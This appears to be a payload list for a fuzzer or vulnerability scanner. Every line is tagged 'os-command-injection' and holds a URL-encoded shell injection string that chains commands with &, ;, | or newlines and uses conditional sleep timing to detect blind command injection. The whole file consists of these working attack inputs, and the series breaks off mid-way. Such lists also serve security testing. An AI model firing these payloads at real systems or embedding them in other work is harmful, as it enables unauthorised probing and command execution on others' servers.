+os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' 